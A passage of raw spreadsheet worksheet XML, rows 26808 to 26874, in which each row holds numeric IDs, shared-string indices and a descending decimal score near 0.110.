    <row r="26808" ht="15.75" customHeight="1">
      <c r="A26808" s="1">
        <v>34201.0</v>
      </c>
      <c r="B26808" s="2">
        <v>1.098672E7</v>
      </c>
      <c r="C26808" s="2" t="s">
        <v>25770</v>
      </c>
      <c r="D26808" s="2">
        <v>1.0</v>
      </c>
      <c r="E26808" s="3" t="s">
        <v>24318</v>
      </c>
      <c r="F26808" s="2">
        <v>0.1102292768959435</v>
      </c>
    </row>
    <row r="26809" ht="15.75" customHeight="1">
      <c r="A26809" s="1">
        <v>660.0</v>
      </c>
      <c r="B26809" s="2">
        <v>2.007961E7</v>
      </c>
      <c r="C26809" s="2" t="s">
        <v>25771</v>
      </c>
      <c r="D26809" s="2">
        <v>1.0</v>
      </c>
      <c r="E26809" s="3" t="s">
        <v>24318</v>
      </c>
      <c r="F26809" s="2">
        <v>0.1102150537634409</v>
      </c>
    </row>
    <row r="26810" ht="15.75" customHeight="1">
      <c r="A26810" s="1">
        <v>32799.0</v>
      </c>
      <c r="B26810" s="2">
        <v>6151179.0</v>
      </c>
      <c r="C26810" s="2" t="s">
        <v>25772</v>
      </c>
      <c r="D26810" s="2">
        <v>1.0</v>
      </c>
      <c r="E26810" s="3" t="s">
        <v>24318</v>
      </c>
      <c r="F26810" s="2">
        <v>0.1102150537634408</v>
      </c>
    </row>
    <row r="26811" ht="15.75" customHeight="1">
      <c r="A26811" s="1">
        <v>20364.0</v>
      </c>
      <c r="B26811" s="2">
        <v>1.1765931E7</v>
      </c>
      <c r="C26811" s="2" t="s">
        <v>25773</v>
      </c>
      <c r="D26811" s="2">
        <v>1.0</v>
      </c>
      <c r="E26811" s="3" t="s">
        <v>24318</v>
      </c>
      <c r="F26811" s="2">
        <v>0.110200364298725</v>
      </c>
    </row>
    <row r="26812" ht="15.75" customHeight="1">
      <c r="A26812" s="1">
        <v>8742.0</v>
      </c>
      <c r="B26812" s="2">
        <v>5.4533828E7</v>
      </c>
      <c r="C26812" s="2" t="s">
        <v>25774</v>
      </c>
      <c r="D26812" s="2">
        <v>1.0</v>
      </c>
      <c r="E26812" s="3" t="s">
        <v>24318</v>
      </c>
      <c r="F26812" s="2">
        <v>0.1101851851851852</v>
      </c>
    </row>
    <row r="26813" ht="15.75" customHeight="1">
      <c r="A26813" s="1">
        <v>20885.0</v>
      </c>
      <c r="B26813" s="2">
        <v>1.6097612E7</v>
      </c>
      <c r="C26813" s="2" t="s">
        <v>25583</v>
      </c>
      <c r="D26813" s="2">
        <v>1.0</v>
      </c>
      <c r="E26813" s="3" t="s">
        <v>24318</v>
      </c>
      <c r="F26813" s="2">
        <v>0.1101851851851852</v>
      </c>
    </row>
    <row r="26814" ht="15.75" customHeight="1">
      <c r="A26814" s="1">
        <v>12922.0</v>
      </c>
      <c r="B26814" s="2">
        <v>3.2288154E7</v>
      </c>
      <c r="C26814" s="2" t="s">
        <v>25775</v>
      </c>
      <c r="D26814" s="2">
        <v>1.0</v>
      </c>
      <c r="E26814" s="3" t="s">
        <v>24318</v>
      </c>
      <c r="F26814" s="2">
        <v>0.1101694915254237</v>
      </c>
    </row>
    <row r="26815" ht="15.75" customHeight="1">
      <c r="A26815" s="1">
        <v>17795.0</v>
      </c>
      <c r="B26815" s="2">
        <v>5.0801358E7</v>
      </c>
      <c r="C26815" s="2" t="s">
        <v>25776</v>
      </c>
      <c r="D26815" s="2">
        <v>1.0</v>
      </c>
      <c r="E26815" s="3" t="s">
        <v>24318</v>
      </c>
      <c r="F26815" s="2">
        <v>0.1101694915254237</v>
      </c>
    </row>
    <row r="26816" ht="15.75" customHeight="1">
      <c r="A26816" s="1">
        <v>22777.0</v>
      </c>
      <c r="B26816" s="2">
        <v>4.5064699E7</v>
      </c>
      <c r="C26816" s="2" t="s">
        <v>25777</v>
      </c>
      <c r="D26816" s="2">
        <v>1.0</v>
      </c>
      <c r="E26816" s="3" t="s">
        <v>24318</v>
      </c>
      <c r="F26816" s="2">
        <v>0.1101694915254237</v>
      </c>
    </row>
    <row r="26817" ht="15.75" customHeight="1">
      <c r="A26817" s="1">
        <v>32828.0</v>
      </c>
      <c r="B26817" s="2">
        <v>6238337.0</v>
      </c>
      <c r="C26817" s="2" t="s">
        <v>25778</v>
      </c>
      <c r="D26817" s="2">
        <v>1.0</v>
      </c>
      <c r="E26817" s="3" t="s">
        <v>24318</v>
      </c>
      <c r="F26817" s="2">
        <v>0.1101694915254237</v>
      </c>
    </row>
    <row r="26818" ht="15.75" customHeight="1">
      <c r="A26818" s="1">
        <v>8831.0</v>
      </c>
      <c r="B26818" s="2">
        <v>5.4657107E7</v>
      </c>
      <c r="C26818" s="2" t="s">
        <v>25779</v>
      </c>
      <c r="D26818" s="2">
        <v>1.0</v>
      </c>
      <c r="E26818" s="3" t="s">
        <v>24318</v>
      </c>
      <c r="F26818" s="2">
        <v>0.1101532567049808</v>
      </c>
    </row>
    <row r="26819" ht="15.75" customHeight="1">
      <c r="A26819" s="1">
        <v>22316.0</v>
      </c>
      <c r="B26819" s="2">
        <v>3.3952723E7</v>
      </c>
      <c r="C26819" s="2" t="s">
        <v>25780</v>
      </c>
      <c r="D26819" s="2">
        <v>1.0</v>
      </c>
      <c r="E26819" s="3" t="s">
        <v>24318</v>
      </c>
      <c r="F26819" s="2">
        <v>0.1101532567049808</v>
      </c>
    </row>
    <row r="26820" ht="15.75" customHeight="1">
      <c r="A26820" s="1">
        <v>10714.0</v>
      </c>
      <c r="B26820" s="2">
        <v>1.5033573E7</v>
      </c>
      <c r="C26820" s="2" t="s">
        <v>25781</v>
      </c>
      <c r="D26820" s="2">
        <v>1.0</v>
      </c>
      <c r="E26820" s="3" t="s">
        <v>24318</v>
      </c>
      <c r="F26820" s="2">
        <v>0.1101364522417154</v>
      </c>
    </row>
    <row r="26821" ht="15.75" customHeight="1">
      <c r="A26821" s="1">
        <v>13391.0</v>
      </c>
      <c r="B26821" s="2">
        <v>3.494739E7</v>
      </c>
      <c r="C26821" s="2" t="s">
        <v>25782</v>
      </c>
      <c r="D26821" s="2">
        <v>1.0</v>
      </c>
      <c r="E26821" s="3" t="s">
        <v>24318</v>
      </c>
      <c r="F26821" s="2">
        <v>0.1101364522417154</v>
      </c>
    </row>
    <row r="26822" ht="15.75" customHeight="1">
      <c r="A26822" s="1">
        <v>14596.0</v>
      </c>
      <c r="B26822" s="2">
        <v>4.0237307E7</v>
      </c>
      <c r="C26822" s="2" t="s">
        <v>25783</v>
      </c>
      <c r="D26822" s="2">
        <v>1.0</v>
      </c>
      <c r="E26822" s="3" t="s">
        <v>24318</v>
      </c>
      <c r="F26822" s="2">
        <v>0.1101364522417154</v>
      </c>
    </row>
    <row r="26823" ht="15.75" customHeight="1">
      <c r="A26823" s="1">
        <v>16241.0</v>
      </c>
      <c r="B26823" s="2">
        <v>4.5771669E7</v>
      </c>
      <c r="C26823" s="2" t="s">
        <v>25784</v>
      </c>
      <c r="D26823" s="2">
        <v>1.0</v>
      </c>
      <c r="E26823" s="3" t="s">
        <v>24318</v>
      </c>
      <c r="F26823" s="2">
        <v>0.1101364522417154</v>
      </c>
    </row>
    <row r="26824" ht="15.75" customHeight="1">
      <c r="A26824" s="1">
        <v>23646.0</v>
      </c>
      <c r="B26824" s="2">
        <v>6717360.0</v>
      </c>
      <c r="C26824" s="2" t="s">
        <v>25785</v>
      </c>
      <c r="D26824" s="2">
        <v>1.0</v>
      </c>
      <c r="E26824" s="3" t="s">
        <v>24318</v>
      </c>
      <c r="F26824" s="2">
        <v>0.1101364522417154</v>
      </c>
    </row>
    <row r="26825" ht="15.75" customHeight="1">
      <c r="A26825" s="1">
        <v>28814.0</v>
      </c>
      <c r="B26825" s="2">
        <v>2.8704692E7</v>
      </c>
      <c r="C26825" s="2" t="s">
        <v>25786</v>
      </c>
      <c r="D26825" s="2">
        <v>1.0</v>
      </c>
      <c r="E26825" s="3" t="s">
        <v>24318</v>
      </c>
      <c r="F26825" s="2">
        <v>0.1101364522417154</v>
      </c>
    </row>
    <row r="26826" ht="15.75" customHeight="1">
      <c r="A26826" s="1">
        <v>32995.0</v>
      </c>
      <c r="B26826" s="2">
        <v>6615466.0</v>
      </c>
      <c r="C26826" s="2" t="s">
        <v>25787</v>
      </c>
      <c r="D26826" s="2">
        <v>1.0</v>
      </c>
      <c r="E26826" s="3" t="s">
        <v>24318</v>
      </c>
      <c r="F26826" s="2">
        <v>0.1101364522417154</v>
      </c>
    </row>
    <row r="26827" ht="15.75" customHeight="1">
      <c r="A26827" s="1">
        <v>34024.0</v>
      </c>
      <c r="B26827" s="2">
        <v>9514484.0</v>
      </c>
      <c r="C26827" s="2" t="s">
        <v>25788</v>
      </c>
      <c r="D26827" s="2">
        <v>1.0</v>
      </c>
      <c r="E26827" s="3" t="s">
        <v>24318</v>
      </c>
      <c r="F26827" s="2">
        <v>0.1101364522417154</v>
      </c>
    </row>
    <row r="26828" ht="15.75" customHeight="1">
      <c r="A26828" s="1">
        <v>1094.0</v>
      </c>
      <c r="B26828" s="2">
        <v>2.3772645E7</v>
      </c>
      <c r="C26828" s="2" t="s">
        <v>25789</v>
      </c>
      <c r="D26828" s="2">
        <v>1.0</v>
      </c>
      <c r="E26828" s="3" t="s">
        <v>24318</v>
      </c>
      <c r="F26828" s="2">
        <v>0.1101190476190476</v>
      </c>
    </row>
    <row r="26829" ht="15.75" customHeight="1">
      <c r="A26829" s="1">
        <v>1339.0</v>
      </c>
      <c r="B26829" s="2">
        <v>2.5864806E7</v>
      </c>
      <c r="C26829" s="2" t="s">
        <v>25790</v>
      </c>
      <c r="D26829" s="2">
        <v>1.0</v>
      </c>
      <c r="E26829" s="3" t="s">
        <v>24318</v>
      </c>
      <c r="F26829" s="2">
        <v>0.1101190476190476</v>
      </c>
    </row>
    <row r="26830" ht="15.75" customHeight="1">
      <c r="A26830" s="1">
        <v>1872.0</v>
      </c>
      <c r="B26830" s="2">
        <v>2.9637142E7</v>
      </c>
      <c r="C26830" s="2" t="s">
        <v>25791</v>
      </c>
      <c r="D26830" s="2">
        <v>1.0</v>
      </c>
      <c r="E26830" s="3" t="s">
        <v>24318</v>
      </c>
      <c r="F26830" s="2">
        <v>0.1101190476190476</v>
      </c>
    </row>
    <row r="26831" ht="15.75" customHeight="1">
      <c r="A26831" s="1">
        <v>1955.0</v>
      </c>
      <c r="B26831" s="2">
        <v>3.0282857E7</v>
      </c>
      <c r="C26831" s="2" t="s">
        <v>25792</v>
      </c>
      <c r="D26831" s="2">
        <v>1.0</v>
      </c>
      <c r="E26831" s="3" t="s">
        <v>24318</v>
      </c>
      <c r="F26831" s="2">
        <v>0.1101190476190476</v>
      </c>
    </row>
    <row r="26832" ht="15.75" customHeight="1">
      <c r="A26832" s="1">
        <v>2465.0</v>
      </c>
      <c r="B26832" s="2">
        <v>3.3814477E7</v>
      </c>
      <c r="C26832" s="2" t="s">
        <v>25793</v>
      </c>
      <c r="D26832" s="2">
        <v>1.0</v>
      </c>
      <c r="E26832" s="3" t="s">
        <v>24318</v>
      </c>
      <c r="F26832" s="2">
        <v>0.1101190476190476</v>
      </c>
    </row>
    <row r="26833" ht="15.75" customHeight="1">
      <c r="A26833" s="1">
        <v>3554.0</v>
      </c>
      <c r="B26833" s="2">
        <v>3.8784497E7</v>
      </c>
      <c r="C26833" s="2" t="s">
        <v>25794</v>
      </c>
      <c r="D26833" s="2">
        <v>1.0</v>
      </c>
      <c r="E26833" s="3" t="s">
        <v>24318</v>
      </c>
      <c r="F26833" s="2">
        <v>0.1101190476190476</v>
      </c>
    </row>
    <row r="26834" ht="15.75" customHeight="1">
      <c r="A26834" s="1">
        <v>4085.0</v>
      </c>
      <c r="B26834" s="2">
        <v>4.1197946E7</v>
      </c>
      <c r="C26834" s="2" t="s">
        <v>25795</v>
      </c>
      <c r="D26834" s="2">
        <v>1.0</v>
      </c>
      <c r="E26834" s="3" t="s">
        <v>24318</v>
      </c>
      <c r="F26834" s="2">
        <v>0.1101190476190476</v>
      </c>
    </row>
    <row r="26835" ht="15.75" customHeight="1">
      <c r="A26835" s="1">
        <v>4121.0</v>
      </c>
      <c r="B26835" s="2">
        <v>4.1359122E7</v>
      </c>
      <c r="C26835" s="2" t="s">
        <v>25796</v>
      </c>
      <c r="D26835" s="2">
        <v>1.0</v>
      </c>
      <c r="E26835" s="3" t="s">
        <v>24318</v>
      </c>
      <c r="F26835" s="2">
        <v>0.1101190476190476</v>
      </c>
    </row>
    <row r="26836" ht="15.75" customHeight="1">
      <c r="A26836" s="1">
        <v>4378.0</v>
      </c>
      <c r="B26836" s="2">
        <v>4.2155749E7</v>
      </c>
      <c r="C26836" s="2" t="s">
        <v>25797</v>
      </c>
      <c r="D26836" s="2">
        <v>1.0</v>
      </c>
      <c r="E26836" s="3" t="s">
        <v>24318</v>
      </c>
      <c r="F26836" s="2">
        <v>0.1101190476190476</v>
      </c>
    </row>
    <row r="26837" ht="15.75" customHeight="1">
      <c r="A26837" s="1">
        <v>4968.0</v>
      </c>
      <c r="B26837" s="2">
        <v>4.4091987E7</v>
      </c>
      <c r="C26837" s="2" t="s">
        <v>25798</v>
      </c>
      <c r="D26837" s="2">
        <v>1.0</v>
      </c>
      <c r="E26837" s="3" t="s">
        <v>24318</v>
      </c>
      <c r="F26837" s="2">
        <v>0.1101190476190476</v>
      </c>
    </row>
    <row r="26838" ht="15.75" customHeight="1">
      <c r="A26838" s="1">
        <v>5555.0</v>
      </c>
      <c r="B26838" s="2">
        <v>4.5967692E7</v>
      </c>
      <c r="C26838" s="2" t="s">
        <v>25799</v>
      </c>
      <c r="D26838" s="2">
        <v>1.0</v>
      </c>
      <c r="E26838" s="3" t="s">
        <v>24318</v>
      </c>
      <c r="F26838" s="2">
        <v>0.1101190476190476</v>
      </c>
    </row>
    <row r="26839" ht="15.75" customHeight="1">
      <c r="A26839" s="1">
        <v>6637.0</v>
      </c>
      <c r="B26839" s="2">
        <v>4.9063021E7</v>
      </c>
      <c r="C26839" s="2" t="s">
        <v>25800</v>
      </c>
      <c r="D26839" s="2">
        <v>1.0</v>
      </c>
      <c r="E26839" s="3" t="s">
        <v>24318</v>
      </c>
      <c r="F26839" s="2">
        <v>0.1101190476190476</v>
      </c>
    </row>
    <row r="26840" ht="15.75" customHeight="1">
      <c r="A26840" s="1">
        <v>6979.0</v>
      </c>
      <c r="B26840" s="2">
        <v>5.0030166E7</v>
      </c>
      <c r="C26840" s="2" t="s">
        <v>25801</v>
      </c>
      <c r="D26840" s="2">
        <v>1.0</v>
      </c>
      <c r="E26840" s="3" t="s">
        <v>24318</v>
      </c>
      <c r="F26840" s="2">
        <v>0.1101190476190476</v>
      </c>
    </row>
    <row r="26841" ht="15.75" customHeight="1">
      <c r="A26841" s="1">
        <v>7748.0</v>
      </c>
      <c r="B26841" s="2">
        <v>5.2087E7</v>
      </c>
      <c r="C26841" s="2" t="s">
        <v>25802</v>
      </c>
      <c r="D26841" s="2">
        <v>1.0</v>
      </c>
      <c r="E26841" s="3" t="s">
        <v>24318</v>
      </c>
      <c r="F26841" s="2">
        <v>0.1101190476190476</v>
      </c>
    </row>
    <row r="26842" ht="15.75" customHeight="1">
      <c r="A26842" s="1">
        <v>7831.0</v>
      </c>
      <c r="B26842" s="2">
        <v>5.2312676E7</v>
      </c>
      <c r="C26842" s="2" t="s">
        <v>25803</v>
      </c>
      <c r="D26842" s="2">
        <v>1.0</v>
      </c>
      <c r="E26842" s="3" t="s">
        <v>24318</v>
      </c>
      <c r="F26842" s="2">
        <v>0.1101190476190476</v>
      </c>
    </row>
    <row r="26843" ht="15.75" customHeight="1">
      <c r="A26843" s="1">
        <v>9699.0</v>
      </c>
      <c r="B26843" s="2">
        <v>5.6367707E7</v>
      </c>
      <c r="C26843" s="2" t="s">
        <v>25804</v>
      </c>
      <c r="D26843" s="2">
        <v>1.0</v>
      </c>
      <c r="E26843" s="3" t="s">
        <v>24318</v>
      </c>
      <c r="F26843" s="2">
        <v>0.1101190476190476</v>
      </c>
    </row>
    <row r="26844" ht="15.75" customHeight="1">
      <c r="A26844" s="1">
        <v>11849.0</v>
      </c>
      <c r="B26844" s="2">
        <v>2.4746282E7</v>
      </c>
      <c r="C26844" s="2" t="s">
        <v>25805</v>
      </c>
      <c r="D26844" s="2">
        <v>1.0</v>
      </c>
      <c r="E26844" s="3" t="s">
        <v>24318</v>
      </c>
      <c r="F26844" s="2">
        <v>0.1101190476190476</v>
      </c>
    </row>
    <row r="26845" ht="15.75" customHeight="1">
      <c r="A26845" s="1">
        <v>14019.0</v>
      </c>
      <c r="B26845" s="2">
        <v>3.7478731E7</v>
      </c>
      <c r="C26845" s="2" t="s">
        <v>25806</v>
      </c>
      <c r="D26845" s="2">
        <v>1.0</v>
      </c>
      <c r="E26845" s="3" t="s">
        <v>24318</v>
      </c>
      <c r="F26845" s="2">
        <v>0.1101190476190476</v>
      </c>
    </row>
    <row r="26846" ht="15.75" customHeight="1">
      <c r="A26846" s="1">
        <v>14066.0</v>
      </c>
      <c r="B26846" s="2">
        <v>3.7599699E7</v>
      </c>
      <c r="C26846" s="2" t="s">
        <v>25807</v>
      </c>
      <c r="D26846" s="2">
        <v>1.0</v>
      </c>
      <c r="E26846" s="3" t="s">
        <v>24318</v>
      </c>
      <c r="F26846" s="2">
        <v>0.1101190476190476</v>
      </c>
    </row>
    <row r="26847" ht="15.75" customHeight="1">
      <c r="A26847" s="1">
        <v>14249.0</v>
      </c>
      <c r="B26847" s="2">
        <v>3.8364528E7</v>
      </c>
      <c r="C26847" s="2" t="s">
        <v>25808</v>
      </c>
      <c r="D26847" s="2">
        <v>1.0</v>
      </c>
      <c r="E26847" s="3" t="s">
        <v>24318</v>
      </c>
      <c r="F26847" s="2">
        <v>0.1101190476190476</v>
      </c>
    </row>
    <row r="26848" ht="15.75" customHeight="1">
      <c r="A26848" s="1">
        <v>14960.0</v>
      </c>
      <c r="B26848" s="2">
        <v>4.1334525E7</v>
      </c>
      <c r="C26848" s="2" t="s">
        <v>25809</v>
      </c>
      <c r="D26848" s="2">
        <v>1.0</v>
      </c>
      <c r="E26848" s="3" t="s">
        <v>24318</v>
      </c>
      <c r="F26848" s="2">
        <v>0.1101190476190476</v>
      </c>
    </row>
    <row r="26849" ht="15.75" customHeight="1">
      <c r="A26849" s="1">
        <v>15602.0</v>
      </c>
      <c r="B26849" s="2">
        <v>4.3498838E7</v>
      </c>
      <c r="C26849" s="2" t="s">
        <v>25810</v>
      </c>
      <c r="D26849" s="2">
        <v>1.0</v>
      </c>
      <c r="E26849" s="3" t="s">
        <v>24318</v>
      </c>
      <c r="F26849" s="2">
        <v>0.1101190476190476</v>
      </c>
    </row>
    <row r="26850" ht="15.75" customHeight="1">
      <c r="A26850" s="1">
        <v>16194.0</v>
      </c>
      <c r="B26850" s="2">
        <v>4.56606E7</v>
      </c>
      <c r="C26850" s="2" t="s">
        <v>25811</v>
      </c>
      <c r="D26850" s="2">
        <v>1.0</v>
      </c>
      <c r="E26850" s="3" t="s">
        <v>24318</v>
      </c>
      <c r="F26850" s="2">
        <v>0.1101190476190476</v>
      </c>
    </row>
    <row r="26851" ht="15.75" customHeight="1">
      <c r="A26851" s="1">
        <v>16989.0</v>
      </c>
      <c r="B26851" s="2">
        <v>4.8348415E7</v>
      </c>
      <c r="C26851" s="2" t="s">
        <v>25812</v>
      </c>
      <c r="D26851" s="2">
        <v>1.0</v>
      </c>
      <c r="E26851" s="3" t="s">
        <v>24318</v>
      </c>
      <c r="F26851" s="2">
        <v>0.1101190476190476</v>
      </c>
    </row>
    <row r="26852" ht="15.75" customHeight="1">
      <c r="A26852" s="1">
        <v>17393.0</v>
      </c>
      <c r="B26852" s="2">
        <v>4.9622146E7</v>
      </c>
      <c r="C26852" s="2" t="s">
        <v>25813</v>
      </c>
      <c r="D26852" s="2">
        <v>1.0</v>
      </c>
      <c r="E26852" s="3" t="s">
        <v>24318</v>
      </c>
      <c r="F26852" s="2">
        <v>0.1101190476190476</v>
      </c>
    </row>
    <row r="26853" ht="15.75" customHeight="1">
      <c r="A26853" s="1">
        <v>18452.0</v>
      </c>
      <c r="B26853" s="2">
        <v>5.2787533E7</v>
      </c>
      <c r="C26853" s="2" t="s">
        <v>25814</v>
      </c>
      <c r="D26853" s="2">
        <v>1.0</v>
      </c>
      <c r="E26853" s="3" t="s">
        <v>24318</v>
      </c>
      <c r="F26853" s="2">
        <v>0.1101190476190476</v>
      </c>
    </row>
    <row r="26854" ht="15.75" customHeight="1">
      <c r="A26854" s="1">
        <v>19227.0</v>
      </c>
      <c r="B26854" s="2">
        <v>5.5051404E7</v>
      </c>
      <c r="C26854" s="2" t="s">
        <v>25815</v>
      </c>
      <c r="D26854" s="2">
        <v>1.0</v>
      </c>
      <c r="E26854" s="3" t="s">
        <v>24318</v>
      </c>
      <c r="F26854" s="2">
        <v>0.1101190476190476</v>
      </c>
    </row>
    <row r="26855" ht="15.75" customHeight="1">
      <c r="A26855" s="1">
        <v>19610.0</v>
      </c>
      <c r="B26855" s="2">
        <v>5.6190425E7</v>
      </c>
      <c r="C26855" s="2" t="s">
        <v>25816</v>
      </c>
      <c r="D26855" s="2">
        <v>1.0</v>
      </c>
      <c r="E26855" s="3" t="s">
        <v>24318</v>
      </c>
      <c r="F26855" s="2">
        <v>0.1101190476190476</v>
      </c>
    </row>
    <row r="26856" ht="15.75" customHeight="1">
      <c r="A26856" s="1">
        <v>20170.0</v>
      </c>
      <c r="B26856" s="2">
        <v>1.0409791E7</v>
      </c>
      <c r="C26856" s="2" t="s">
        <v>25817</v>
      </c>
      <c r="D26856" s="2">
        <v>1.0</v>
      </c>
      <c r="E26856" s="3" t="s">
        <v>24318</v>
      </c>
      <c r="F26856" s="2">
        <v>0.1101190476190476</v>
      </c>
    </row>
    <row r="26857" ht="15.75" customHeight="1">
      <c r="A26857" s="1">
        <v>20374.0</v>
      </c>
      <c r="B26857" s="2">
        <v>1.1836648E7</v>
      </c>
      <c r="C26857" s="2" t="s">
        <v>25818</v>
      </c>
      <c r="D26857" s="2">
        <v>1.0</v>
      </c>
      <c r="E26857" s="3" t="s">
        <v>24318</v>
      </c>
      <c r="F26857" s="2">
        <v>0.1101190476190476</v>
      </c>
    </row>
    <row r="26858" ht="15.75" customHeight="1">
      <c r="A26858" s="1">
        <v>20479.0</v>
      </c>
      <c r="B26858" s="2">
        <v>1.2828834E7</v>
      </c>
      <c r="C26858" s="2" t="s">
        <v>25819</v>
      </c>
      <c r="D26858" s="2">
        <v>1.0</v>
      </c>
      <c r="E26858" s="3" t="s">
        <v>24318</v>
      </c>
      <c r="F26858" s="2">
        <v>0.1101190476190476</v>
      </c>
    </row>
    <row r="26859" ht="15.75" customHeight="1">
      <c r="A26859" s="1">
        <v>21185.0</v>
      </c>
      <c r="B26859" s="2">
        <v>1.9228757E7</v>
      </c>
      <c r="C26859" s="2" t="s">
        <v>25820</v>
      </c>
      <c r="D26859" s="2">
        <v>1.0</v>
      </c>
      <c r="E26859" s="3" t="s">
        <v>24318</v>
      </c>
      <c r="F26859" s="2">
        <v>0.1101190476190476</v>
      </c>
    </row>
    <row r="26860" ht="15.75" customHeight="1">
      <c r="A26860" s="1">
        <v>21424.0</v>
      </c>
      <c r="B26860" s="2">
        <v>2.2095445E7</v>
      </c>
      <c r="C26860" s="2" t="s">
        <v>25821</v>
      </c>
      <c r="D26860" s="2">
        <v>1.0</v>
      </c>
      <c r="E26860" s="3" t="s">
        <v>24318</v>
      </c>
      <c r="F26860" s="2">
        <v>0.1101190476190476</v>
      </c>
    </row>
    <row r="26861" ht="15.75" customHeight="1">
      <c r="A26861" s="1">
        <v>21475.0</v>
      </c>
      <c r="B26861" s="2">
        <v>2.2972406E7</v>
      </c>
      <c r="C26861" s="2" t="s">
        <v>23740</v>
      </c>
      <c r="D26861" s="2">
        <v>1.0</v>
      </c>
      <c r="E26861" s="3" t="s">
        <v>24318</v>
      </c>
      <c r="F26861" s="2">
        <v>0.1101190476190476</v>
      </c>
    </row>
    <row r="26862" ht="15.75" customHeight="1">
      <c r="A26862" s="1">
        <v>21742.0</v>
      </c>
      <c r="B26862" s="2">
        <v>2.5892028E7</v>
      </c>
      <c r="C26862" s="2" t="s">
        <v>25822</v>
      </c>
      <c r="D26862" s="2">
        <v>1.0</v>
      </c>
      <c r="E26862" s="3" t="s">
        <v>24318</v>
      </c>
      <c r="F26862" s="2">
        <v>0.1101190476190476</v>
      </c>
    </row>
    <row r="26863" ht="15.75" customHeight="1">
      <c r="A26863" s="1">
        <v>21924.0</v>
      </c>
      <c r="B26863" s="2">
        <v>2.8440231E7</v>
      </c>
      <c r="C26863" s="2" t="s">
        <v>25823</v>
      </c>
      <c r="D26863" s="2">
        <v>1.0</v>
      </c>
      <c r="E26863" s="3" t="s">
        <v>24318</v>
      </c>
      <c r="F26863" s="2">
        <v>0.1101190476190476</v>
      </c>
    </row>
    <row r="26864" ht="15.75" customHeight="1">
      <c r="A26864" s="1">
        <v>22656.0</v>
      </c>
      <c r="B26864" s="2">
        <v>4.1142435E7</v>
      </c>
      <c r="C26864" s="2" t="s">
        <v>25824</v>
      </c>
      <c r="D26864" s="2">
        <v>1.0</v>
      </c>
      <c r="E26864" s="3" t="s">
        <v>24318</v>
      </c>
      <c r="F26864" s="2">
        <v>0.1101190476190476</v>
      </c>
    </row>
    <row r="26865" ht="15.75" customHeight="1">
      <c r="A26865" s="1">
        <v>22666.0</v>
      </c>
      <c r="B26865" s="2">
        <v>4.1348397E7</v>
      </c>
      <c r="C26865" s="2" t="s">
        <v>25825</v>
      </c>
      <c r="D26865" s="2">
        <v>1.0</v>
      </c>
      <c r="E26865" s="3" t="s">
        <v>24318</v>
      </c>
      <c r="F26865" s="2">
        <v>0.1101190476190476</v>
      </c>
    </row>
    <row r="26866" ht="15.75" customHeight="1">
      <c r="A26866" s="1">
        <v>22869.0</v>
      </c>
      <c r="B26866" s="2">
        <v>4.7481605E7</v>
      </c>
      <c r="C26866" s="2" t="s">
        <v>25826</v>
      </c>
      <c r="D26866" s="2">
        <v>1.0</v>
      </c>
      <c r="E26866" s="3" t="s">
        <v>24318</v>
      </c>
      <c r="F26866" s="2">
        <v>0.1101190476190476</v>
      </c>
    </row>
    <row r="26867" ht="15.75" customHeight="1">
      <c r="A26867" s="1">
        <v>22873.0</v>
      </c>
      <c r="B26867" s="2">
        <v>4.7481651E7</v>
      </c>
      <c r="C26867" s="2" t="s">
        <v>25827</v>
      </c>
      <c r="D26867" s="2">
        <v>1.0</v>
      </c>
      <c r="E26867" s="3" t="s">
        <v>24318</v>
      </c>
      <c r="F26867" s="2">
        <v>0.1101190476190476</v>
      </c>
    </row>
    <row r="26868" ht="15.75" customHeight="1">
      <c r="A26868" s="1">
        <v>22943.0</v>
      </c>
      <c r="B26868" s="2">
        <v>4.8859222E7</v>
      </c>
      <c r="C26868" s="2" t="s">
        <v>25828</v>
      </c>
      <c r="D26868" s="2">
        <v>1.0</v>
      </c>
      <c r="E26868" s="3" t="s">
        <v>24318</v>
      </c>
      <c r="F26868" s="2">
        <v>0.1101190476190476</v>
      </c>
    </row>
    <row r="26869" ht="15.75" customHeight="1">
      <c r="A26869" s="1">
        <v>23200.0</v>
      </c>
      <c r="B26869" s="2">
        <v>5.2484715E7</v>
      </c>
      <c r="C26869" s="2" t="s">
        <v>25829</v>
      </c>
      <c r="D26869" s="2">
        <v>1.0</v>
      </c>
      <c r="E26869" s="3" t="s">
        <v>24318</v>
      </c>
      <c r="F26869" s="2">
        <v>0.1101190476190476</v>
      </c>
    </row>
    <row r="26870" ht="15.75" customHeight="1">
      <c r="A26870" s="1">
        <v>23817.0</v>
      </c>
      <c r="B26870" s="2">
        <v>7970418.0</v>
      </c>
      <c r="C26870" s="2" t="s">
        <v>25830</v>
      </c>
      <c r="D26870" s="2">
        <v>1.0</v>
      </c>
      <c r="E26870" s="3" t="s">
        <v>24318</v>
      </c>
      <c r="F26870" s="2">
        <v>0.1101190476190476</v>
      </c>
    </row>
    <row r="26871" ht="15.75" customHeight="1">
      <c r="A26871" s="1">
        <v>24039.0</v>
      </c>
      <c r="B26871" s="2">
        <v>9486459.0</v>
      </c>
      <c r="C26871" s="2" t="s">
        <v>25831</v>
      </c>
      <c r="D26871" s="2">
        <v>1.0</v>
      </c>
      <c r="E26871" s="3" t="s">
        <v>24318</v>
      </c>
      <c r="F26871" s="2">
        <v>0.1101190476190476</v>
      </c>
    </row>
    <row r="26872" ht="15.75" customHeight="1">
      <c r="A26872" s="1">
        <v>25032.0</v>
      </c>
      <c r="B26872" s="2">
        <v>1.2828833E7</v>
      </c>
      <c r="C26872" s="2" t="s">
        <v>25832</v>
      </c>
      <c r="D26872" s="2">
        <v>1.0</v>
      </c>
      <c r="E26872" s="3" t="s">
        <v>24318</v>
      </c>
      <c r="F26872" s="2">
        <v>0.1101190476190476</v>
      </c>
    </row>
    <row r="26873" ht="15.75" customHeight="1">
      <c r="A26873" s="1">
        <v>25121.0</v>
      </c>
      <c r="B26873" s="2">
        <v>1.2972286E7</v>
      </c>
      <c r="C26873" s="2" t="s">
        <v>25833</v>
      </c>
      <c r="D26873" s="2">
        <v>1.0</v>
      </c>
      <c r="E26873" s="3" t="s">
        <v>24318</v>
      </c>
      <c r="F26873" s="2">
        <v>0.1101190476190476</v>
      </c>
    </row>
    <row r="26874" ht="15.75" customHeight="1">
      <c r="A26874" s="1">
        <v>25470.0</v>
      </c>
      <c r="B26874" s="2">
        <v>1.4006083E7</v>
      </c>
      <c r="C26874" s="2" t="s">
        <v>25834</v>
      </c>
      <c r="D26874" s="2">
        <v>1.0</v>
      </c>
      <c r="E26874" s="3" t="s">
        <v>24318</v>
      </c>
      <c r="F26874" s="2">
        <v>0.1101190476190476</v>
      </c>
    </row>
